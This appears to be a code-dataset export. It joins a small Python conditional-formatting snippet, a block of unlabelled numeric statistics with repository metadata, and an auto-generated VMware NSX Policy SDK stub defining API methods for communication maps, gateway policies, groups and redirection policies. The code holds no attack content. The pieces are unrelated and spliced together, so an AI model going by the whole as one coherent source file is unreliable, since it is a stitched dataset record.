if (
False or True
):
pass
elif (
False or True
):
pass
# Nested
if (True or (False or True)): pass
if (
True or (False or True)
): pass
if (
True or (
False
or True)
): pass
| 8.681818
| 34
| 0.531414
| 56
| 382
| 3.625
| 0.196429
| 0.310345
| 0.487685
| 0.665025
| 0.871921
| 0.871921
| 0.871921
| 0.871921
| 0.871921
| 0.871921
| 0
| 0
| 0.374346
| 382
| 43
| 35
| 8.883721
| 0.849372
| 0.078534
| 0
| 0.62963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 11
|
0faded617019c02ac6f4d9137bce3fb4fb8af3bf
| 122,581
|
py
|
Python
|
com/vmware/nsx_policy/infra/domains_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
com/vmware/nsx_policy/infra/domains_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
com/vmware/nsx_policy/infra/domains_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2020 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.nsx_policy.infra.domains.
#---------------------------------------------------------------------------
"""
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class CommunicationMaps(VapiInterface):
"""
"""
REVISE_OPERATION_TOP = "insert_top"
"""
Possible value for ``operation`` of method :func:`CommunicationMaps.revise`.
"""
REVISE_OPERATION_BOTTOM = "insert_bottom"
"""
Possible value for ``operation`` of method :func:`CommunicationMaps.revise`.
"""
REVISE_OPERATION_AFTER = "insert_after"
"""
Possible value for ``operation`` of method :func:`CommunicationMaps.revise`.
"""
REVISE_OPERATION_BEFORE = "insert_before"
"""
Possible value for ``operation`` of method :func:`CommunicationMaps.revise`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx_policy.infra.domains.communication_maps'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _CommunicationMapsStub)
self._VAPI_OPERATION_IDS = {}
def delete(self,
domain_id,
communication_map_id,
):
"""
Deletes the communication map along with all the communication entries
This API is deprecated. Please use the following API instead. DELETE
/infra/domains/domain-id/security-policies/security-policy-id
:type domain_id: :class:`str`
:param domain_id: (required)
:type communication_map_id: :class:`str`
:param communication_map_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'domain_id': domain_id,
'communication_map_id': communication_map_id,
})
def get(self,
domain_id,
communication_map_id,
):
"""
Read communication-map for a domain. This API is deprecated. Please use
the following API instead. GET
/infra/domains/domain-id/security-policies/security-policy-id
:type domain_id: :class:`str`
:param domain_id: (required)
:type communication_map_id: :class:`str`
:param communication_map_id: (required)
:rtype: :class:`com.vmware.nsx_policy.model_client.CommunicationMap`
:return: com.vmware.nsx_policy.model.CommunicationMap
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'domain_id': domain_id,
'communication_map_id': communication_map_id,
})
def list(self,
domain_id,
cursor=None,
include_mark_for_delete_objects=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
List all communication maps for a domain. This API is deprecated.
Please use the following API instead. GET
/infra/domains/domain-id/security-policies
:type domain_id: :class:`str`
:param domain_id: (required)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type include_mark_for_delete_objects: :class:`bool` or ``None``
:param include_mark_for_delete_objects: Include objects that are marked for deletion in results (optional,
default to false)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx_policy.model_client.CommunicationMapListResult`
:return: com.vmware.nsx_policy.model.CommunicationMapListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'domain_id': domain_id,
'cursor': cursor,
'include_mark_for_delete_objects': include_mark_for_delete_objects,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def patch(self,
domain_id,
communication_map_id,
communication_map,
):
"""
Patch the communication map for a domain. If a communication map for
the given communication-map-id is not present, the object will get
created and if it is present it will be updated. This is a full replace
This API is deprecated. Please use the following API instead. PATCH
/infra/domains/domain-id/security-policies/security-policy-id
:type domain_id: :class:`str`
:param domain_id: (required)
:type communication_map_id: :class:`str`
:param communication_map_id: (required)
:type communication_map: :class:`com.vmware.nsx_policy.model_client.CommunicationMap`
:param communication_map: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('patch',
{
'domain_id': domain_id,
'communication_map_id': communication_map_id,
'communication_map': communication_map,
})
def revise(self,
domain_id,
communication_map_id,
communication_map,
anchor_path=None,
operation=None,
):
"""
This is used to set a precedence of a communication map w.r.t others.
This API is deprecated. Please use the following API instead. POST
/infra/domains/domain-id/security-policies/security-policy-id?action=revise
:type domain_id: :class:`str`
:param domain_id: (required)
:type communication_map_id: :class:`str`
:param communication_map_id: (required)
:type communication_map: :class:`com.vmware.nsx_policy.model_client.CommunicationMap`
:param communication_map: (required)
:type anchor_path: :class:`str` or ``None``
:param anchor_path: The communication map/communication entry path if operation is
'insert_after' or 'insert_before' (optional)
:type operation: :class:`str` or ``None``
:param operation: Operation (optional, default to insert_top)
:rtype: :class:`com.vmware.nsx_policy.model_client.CommunicationMap`
:return: com.vmware.nsx_policy.model.CommunicationMap
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('revise',
{
'domain_id': domain_id,
'communication_map_id': communication_map_id,
'communication_map': communication_map,
'anchor_path': anchor_path,
'operation': operation,
})
def update(self,
domain_id,
communication_map_id,
communication_map,
):
"""
Create or Update the communication map for a domain. This is a full
replace. All the CommunicationEntries are replaced. This API is
deprecated. Please use the following API instead. PUT
/infra/domains/domain-id/security-policies/security-policy-id
:type domain_id: :class:`str`
:param domain_id: (required)
:type communication_map_id: :class:`str`
:param communication_map_id: (required)
:type communication_map: :class:`com.vmware.nsx_policy.model_client.CommunicationMap`
:param communication_map: (required)
:rtype: :class:`com.vmware.nsx_policy.model_client.CommunicationMap`
:return: com.vmware.nsx_policy.model.CommunicationMap
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'domain_id': domain_id,
'communication_map_id': communication_map_id,
'communication_map': communication_map,
})
class GatewayPolicies(VapiInterface):
"""
"""
REVISE_OPERATION_TOP = "insert_top"
"""
Possible value for ``operation`` of method :func:`GatewayPolicies.revise`.
"""
REVISE_OPERATION_BOTTOM = "insert_bottom"
"""
Possible value for ``operation`` of method :func:`GatewayPolicies.revise`.
"""
REVISE_OPERATION_AFTER = "insert_after"
"""
Possible value for ``operation`` of method :func:`GatewayPolicies.revise`.
"""
REVISE_OPERATION_BEFORE = "insert_before"
"""
Possible value for ``operation`` of method :func:`GatewayPolicies.revise`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx_policy.infra.domains.gateway_policies'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _GatewayPoliciesStub)
self._VAPI_OPERATION_IDS = {}
def delete(self,
domain_id,
gateway_policy_id,
):
"""
Delete GatewayPolicy
:type domain_id: :class:`str`
:param domain_id: (required)
:type gateway_policy_id: :class:`str`
:param gateway_policy_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'domain_id': domain_id,
'gateway_policy_id': gateway_policy_id,
})
def get(self,
domain_id,
gateway_policy_id,
):
"""
Read gateway policy for a domain.
:type domain_id: :class:`str`
:param domain_id: (required)
:type gateway_policy_id: :class:`str`
:param gateway_policy_id: (required)
:rtype: :class:`com.vmware.nsx_policy.model_client.GatewayPolicy`
:return: com.vmware.nsx_policy.model.GatewayPolicy
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'domain_id': domain_id,
'gateway_policy_id': gateway_policy_id,
})
def list(self,
domain_id,
cursor=None,
include_mark_for_delete_objects=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
List all gateway policies for specified Domain.
:type domain_id: :class:`str`
:param domain_id: (required)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type include_mark_for_delete_objects: :class:`bool` or ``None``
:param include_mark_for_delete_objects: Include objects that are marked for deletion in results (optional,
default to false)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx_policy.model_client.GatewayPolicyListResult`
:return: com.vmware.nsx_policy.model.GatewayPolicyListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'domain_id': domain_id,
'cursor': cursor,
'include_mark_for_delete_objects': include_mark_for_delete_objects,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def patch(self,
domain_id,
gateway_policy_id,
gateway_policy,
):
"""
Update the gateway policy for a domain. This is a full replace. All the
rules are replaced.
:type domain_id: :class:`str`
:param domain_id: (required)
:type gateway_policy_id: :class:`str`
:param gateway_policy_id: (required)
:type gateway_policy: :class:`com.vmware.nsx_policy.model_client.GatewayPolicy`
:param gateway_policy: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('patch',
{
'domain_id': domain_id,
'gateway_policy_id': gateway_policy_id,
'gateway_policy': gateway_policy,
})
def revise(self,
domain_id,
gateway_policy_id,
gateway_policy,
anchor_path=None,
operation=None,
):
"""
This is used to set a precedence of a gateway policy w.r.t others.
:type domain_id: :class:`str`
:param domain_id: (required)
:type gateway_policy_id: :class:`str`
:param gateway_policy_id: (required)
:type gateway_policy: :class:`com.vmware.nsx_policy.model_client.GatewayPolicy`
:param gateway_policy: (required)
:type anchor_path: :class:`str` or ``None``
:param anchor_path: The security policy/rule path if operation is 'insert_after' or
'insert_before' (optional)
:type operation: :class:`str` or ``None``
:param operation: Operation (optional, default to insert_top)
:rtype: :class:`com.vmware.nsx_policy.model_client.GatewayPolicy`
:return: com.vmware.nsx_policy.model.GatewayPolicy
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('revise',
{
'domain_id': domain_id,
'gateway_policy_id': gateway_policy_id,
'gateway_policy': gateway_policy,
'anchor_path': anchor_path,
'operation': operation,
})
def update(self,
domain_id,
gateway_policy_id,
gateway_policy,
):
"""
Update the gateway policy for a domain. This is a full replace. All the
rules are replaced.
:type domain_id: :class:`str`
:param domain_id: (required)
:type gateway_policy_id: :class:`str`
:param gateway_policy_id: (required)
:type gateway_policy: :class:`com.vmware.nsx_policy.model_client.GatewayPolicy`
:param gateway_policy: (required)
:rtype: :class:`com.vmware.nsx_policy.model_client.GatewayPolicy`
:return: com.vmware.nsx_policy.model.GatewayPolicy
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'domain_id': domain_id,
'gateway_policy_id': gateway_policy_id,
'gateway_policy': gateway_policy,
})
class Groups(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx_policy.infra.domains.groups'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _GroupsStub)
self._VAPI_OPERATION_IDS = {}
def delete(self,
domain_id,
group_id,
fail_if_subtree_exists=None,
force=None,
):
"""
Delete Group
:type domain_id: :class:`str`
:param domain_id: Domain ID (required)
:type group_id: :class:`str`
:param group_id: Group ID (required)
:type fail_if_subtree_exists: :class:`bool` or ``None``
:param fail_if_subtree_exists: Do not delete if the group subtree has any entities (optional,
default to false)
:type force: :class:`bool` or ``None``
:param force: Force delete the resource even if it is being used somewhere
(optional, default to false)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'domain_id': domain_id,
'group_id': group_id,
'fail_if_subtree_exists': fail_if_subtree_exists,
'force': force,
})
def get(self,
domain_id,
group_id,
):
"""
Read group
:type domain_id: :class:`str`
:param domain_id: Domain ID (required)
:type group_id: :class:`str`
:param group_id: Group ID (required)
:rtype: :class:`com.vmware.nsx_policy.model_client.Group`
:return: com.vmware.nsx_policy.model.Group
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'domain_id': domain_id,
'group_id': group_id,
})
def list(self,
domain_id,
cursor=None,
include_mark_for_delete_objects=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
List Groups for a domain
:type domain_id: :class:`str`
:param domain_id: Domain ID (required)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type include_mark_for_delete_objects: :class:`bool` or ``None``
:param include_mark_for_delete_objects: Include objects that are marked for deletion in results (optional,
default to false)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx_policy.model_client.GroupListResult`
:return: com.vmware.nsx_policy.model.GroupListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'domain_id': domain_id,
'cursor': cursor,
'include_mark_for_delete_objects': include_mark_for_delete_objects,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def patch(self,
domain_id,
group_id,
group,
):
"""
If a group with the group-id is not already present, create a new
group. If it already exists, patch the group.
:type domain_id: :class:`str`
:param domain_id: Domain ID (required)
:type group_id: :class:`str`
:param group_id: Group ID (required)
:type group: :class:`com.vmware.nsx_policy.model_client.Group`
:param group: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('patch',
{
'domain_id': domain_id,
'group_id': group_id,
'group': group,
})
def update(self,
domain_id,
group_id,
group,
):
"""
If a group with the group-id is not already present, create a new
group. If it already exists, update the group.
:type domain_id: :class:`str`
:param domain_id: Domain ID (required)
:type group_id: :class:`str`
:param group_id: Group ID (required)
:type group: :class:`com.vmware.nsx_policy.model_client.Group`
:param group: (required)
:rtype: :class:`com.vmware.nsx_policy.model_client.Group`
:return: com.vmware.nsx_policy.model.Group
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'domain_id': domain_id,
'group_id': group_id,
'group': group,
})
class RedirectionPolicies(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx_policy.infra.domains.redirection_policies'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _RedirectionPoliciesStub)
self._VAPI_OPERATION_IDS = {}
def delete(self,
domain_id,
redirection_policy_id,
):
"""
Delete redirection policy.
:type domain_id: :class:`str`
:param domain_id: Domain id (required)
:type redirection_policy_id: :class:`str`
:param redirection_policy_id: Redirection map id (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'domain_id': domain_id,
'redirection_policy_id': redirection_policy_id,
})
def get(self,
domain_id,
redirection_policy_id,
):
"""
Read redirection policy.
:type domain_id: :class:`str`
:param domain_id: Domain id (required)
:type redirection_policy_id: :class:`str`
:param redirection_policy_id: Redirection map id (required)
:rtype: :class:`com.vmware.nsx_policy.model_client.RedirectionPolicy`
:return: com.vmware.nsx_policy.model.RedirectionPolicy
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'domain_id': domain_id,
'redirection_policy_id': redirection_policy_id,
})
def list(self,
cursor=None,
include_mark_for_delete_objects=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
List all redirection policys across all domains ordered by precedence.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type include_mark_for_delete_objects: :class:`bool` or ``None``
:param include_mark_for_delete_objects: Include objects that are marked for deletion in results (optional,
default to false)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx_policy.model_client.RedirectionPolicyListResult`
:return: com.vmware.nsx_policy.model.RedirectionPolicyListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'include_mark_for_delete_objects': include_mark_for_delete_objects,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def list_0(self,
domain_id,
cursor=None,
include_mark_for_delete_objects=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
List redirection policys for a domain
:type domain_id: :class:`str`
:param domain_id: Domain id (required)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type include_mark_for_delete_objects: :class:`bool` or ``None``
:param include_mark_for_delete_objects: Include objects that are marked for deletion in results (optional,
default to false)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx_policy.model_client.RedirectionPolicyListResult`
:return: com.vmware.nsx_policy.model.RedirectionPolicyListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list_0',
{
'domain_id': domain_id,
'cursor': cursor,
'include_mark_for_delete_objects': include_mark_for_delete_objects,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def patch(self,
domain_id,
redirection_policy_id,
redirection_policy,
):
"""
Create or update the redirection policy.
:type domain_id: :class:`str`
:param domain_id: Domain id (required)
:type redirection_policy_id: :class:`str`
:param redirection_policy_id: Redirection map id (required)
:type redirection_policy: :class:`com.vmware.nsx_policy.model_client.RedirectionPolicy`
:param redirection_policy: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('patch',
{
'domain_id': domain_id,
'redirection_policy_id': redirection_policy_id,
'redirection_policy': redirection_policy,
})
def update(self,
domain_id,
redirection_policy_id,
redirection_policy,
):
"""
Create or update the redirection policy.
:type domain_id: :class:`str`
:param domain_id: Domain id (required)
:type redirection_policy_id: :class:`str`
:param redirection_policy_id: Redirection map id (required)
:type redirection_policy: :class:`com.vmware.nsx_policy.model_client.RedirectionPolicy`
:param redirection_policy: (required)
:rtype: :class:`com.vmware.nsx_policy.model_client.RedirectionPolicy`
:return: com.vmware.nsx_policy.model.RedirectionPolicy
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'domain_id': domain_id,
'redirection_policy_id': redirection_policy_id,
'redirection_policy': redirection_policy,
})
